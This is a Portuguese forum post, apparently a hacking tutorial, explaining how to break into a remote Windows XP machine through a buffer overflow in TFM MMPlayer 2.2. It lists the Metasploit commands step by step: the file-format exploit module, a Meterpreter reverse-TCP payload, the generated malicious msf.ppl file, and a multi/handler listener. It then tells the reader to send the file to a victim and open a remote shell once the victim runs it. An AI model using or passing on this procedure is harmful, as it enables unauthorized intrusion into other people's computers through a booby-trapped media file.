Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Invadir Windows remoto usando TFM MMPlayer (m3u/ppl File) Buffer Overflow

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Invadir Windows remoto usando TFM MMPlayer (m3u/ppl File) Buffer Overflow

    Este módulo explora um buffer overflow no MMPlayer 2,2 a vulnerabilidade é acionada ao abrir um arquivo malformado M3U/PPL que contém uma cadeia muito longa, o que resulta na substituição de um registro SEH, permitindo assim a execução de código arbitrário no contexto do usuário.

    Exploit Metas
    MMPlayer 2,2

    Windows XP SP 2

    Exigência
    Atacante : Backtrack 5

    Vítima PC : Windows XP

    Abrir o terminal msfconsole



    Agora digite use exploit/windows/fileformat/tfm_mmplayer_m3u_ppl_bof

    Código:
    Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set payload windows/meterpreter/reverse_tcp
    
    Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set lhost 192.168.1.2 (IP of Local Host)
    
    Msf exploit (tfm_mmplayer_m3u_ppl_bof)>set srvhost 192.168.1.2
    
    Msf exploit (tfm_mmplayer_m3u_ppl_bof)>exploit


    Depois conseguimos gerar o arquivo malicioso, ele será armazenado em seu computador local

    /root/.msf4/local/msf.ppl



    Agora precisamos configurar um ouvinte para lidar com conexão reversa enviada por vítima quando o exploit for executado com sucesso.

    Código:
    use exploit/multi/handler
    
    set payload windows/meterpreter/reverse_tcp
    
    set lhost 192.168.1.2
    
    exploit
    Agora envie o seu msf.ppl para vítima, assim que ela baixar e abri-lo você pode acessar o Meterpreter shell no computador da vítima.

X
Working...
X